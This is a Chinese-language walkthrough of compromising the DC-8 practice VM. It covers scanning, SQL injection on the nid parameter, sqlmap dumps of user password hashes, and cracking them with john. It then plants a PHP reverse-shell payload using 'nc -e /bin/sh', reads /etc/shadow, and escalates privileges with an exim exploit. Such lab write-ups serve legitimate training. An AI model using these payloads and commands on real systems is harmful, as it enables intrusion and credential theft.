＜渗透练习＞DC-8靶机渗透实验

靶机—DC-8

环境配置：
使用平台：VMware
网卡模式：NAT模式
所属网段：217
攻击机kali：192.168.217.131
靶机dc8：未知

一、信息获取

1.masscan -p22 192.168.217.0/24 --rate=2000 ---------扫描获取217网段下的linux系统的ip

获取到ip：192.168.217.148，目前只开启了kali和dc8，所以推测该ip为dc8的IP地址

2.nmap -sC -sV -p- -n 192.168.217.148 --min-rate=2000 -------扫描获取靶机端口信息

得到了: 22/tcp open ssh OpenSSH 7.4p1
80/tcp open http Apache httpd

3.searchsploit OpenSSH 7.4p1 ----------扫描ssh服务的系统漏洞

都是用户名枚举，没啥可用的

searchsploit Apache httpd ----------扫描http服务的系统漏洞

都没啥有用的

4…gobuster dir -u 192.168.217.148 -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 20------探测目录

探测出很多目录，403无法访问，301资源被永久转移无法访问，只有200可用

5.gobuster dir -u 192.168.217.148 -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 20 -s200
-----筛选出了状态200（可访问）的目录

/0 (Status: 200)
/node (Status: 200)
/robots.txt (Status: 200)
/user (Status: 200)

6.访问192.168.217.148查看网站首页

7.访问其余目录

192.168.217.148/0

与首页没什么区别

192.168.217.148/node

内容翻译：尚未创建首页内容

192.168.217.148/user

这是个登陆注册界面，很重要

192.168.217.148/robots.txt

都是文本
二、漏洞挖掘
1.先从首页看起，查看源代码，正经的html编写没啥有用的
2.点点旁边的跳转链接，有了新发现

在导航栏处发现了疑似sql语句的东西，可以试试是否存在sql注入，虽然个人很喜欢直接分析源码，但都看出来了就先试试

输入了’，发现网站报错，sql注入实锤，，最后一行还给出了一条路径，不知道有没有用，先准备尝试爆库

路径/var/www/html/sites/all/modules/mypages/mypages.module
3.爆库
方法一、手工注入

○1直接在导航栏上输入语句试试

还是报错界面，什么都没有，那抓包看看

○2nid换成0试试，

爆库名成功

○3爆表名

nid=0 union select group_concat(table_name) from
information_schema.tables where table_schema=database()

○4爆字段 nid=0 union select group_concat(column_name) from
information_schema.columns where table_name=’users’ and
table_schema=database()

○5爆数据 nid=0 union select group_concat(name,pass) from users

方法二、采取sqlmap

○1.sqlmap -u “http://192.168.217.148/?nid=1” --dbs --------获取数据库表名

获取到两个数据库名，显然，d7db是我们要的数据库

○2.sqlmap -u “http://192.168.217.148/?nid=1” -D d7db --tables
------获取数据库表名

一共探测出来了88个表，有一张users表，应该包含了登陆信息，继续探测

○3.sqlmap -u “http://192.168.217.148/?nid=1” -D d7db -T users
–columns------探测表里的列

探测出来了16列，name和pass应该是登录的账号和密码

○4.sqlmap -u “http://192.168.217.148/?nid=1” -D d7db -T users -C
name,pass --dump ------获取数据

获取到了两行数据

$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

是一串加密数据

○5.用burp suite解码，所有模式都试过了全都不行，直接上百度 查到是要用john工具破解，用户名的john也是一种提示 Vi
john -------创建一个名为john的文件

把密码写入文档

John john --show ------开始对密码解码

只获得了一个数据turtle

打开之前探测到的登录界面尝试
admin turtle
john turtle

john turtle 进入成功，证明了admin密码破解失败

三、进入靶机
看到了ADD content 看到文本框，先输入点什么抓包看看

用burp suite抓包看看

输入的内容都被转码了，无法直接编写shall脚本
再点点别的，在Contact Us 里找到了可以容纳php的地方

Contact Us–Webform–Form settings

此处输入

shell<?php system("nc -e /bin/sh 192.168.217.131 8888"); ?>

保存
在kali上开启监听

nc -lvvp 8888

在view中随便输入点内容，kali成功获得shell

whoami #查看当前用户身份
uname -a #查看系统信息
history #查看命令历史，有可能可以查看到管理员的一些重要命令，包括密码等
last #查看登录历史
cat /etc/passwd #查看用户
cat /etc/shadow #查看密码

四、提权
先返回一个稳定的shell

python -c “import pty;pty.spawn(’/bin/bash’)”

uname –a----------查看内核信息

searchsploit Linux dc-8 4.9.0-4-amd64-----扫描内核漏洞

想先从内核漏洞提权出来，但是扫描不到结果

利用suid提权试试

find / -perm -u=s -type f 2>/dev/null ----查看具有root用户权限的文件

不知道哪个有用了，查看百度得知，exim4是个特殊文档那就扫描他的漏洞,根据经验exim4应该是exim的第四代，所以搜索exim的漏洞即可

searchsploit exim

---------探测漏洞

搜出来好多，根据翻译结果，Local Privilege Escalation译为本地权限提升，是我们需要的
选择.sh文件的46996.sh

locate 46996.sh -----定位文件

文件位置：

/usr/share/exploitdb/exploits/linux/local/46996.sh

靶机中：

scp root@192.168.217.131:/usr/share/exploitdb/exploits/linux
/local/46996.sh /tmp/q.sh ----获取文件

chmod 777 q.sh ----给予权限
bash ./q.sh -m netcat-----提权

失败，字符有问题，百度一下，源文件是doc格式，linux只识别unix，要在kali中修改文件格式再上传

cd /usr/share/exploitdb/exploits/linux/local/
vi 46996.sh :set ff? --------查询文件格式
:set ff=unix ------- 将文件格式改成Unix格式

再重做获取文件，权限基于和提权

提权成功

cd /root
ls
cat flag.txt

成功！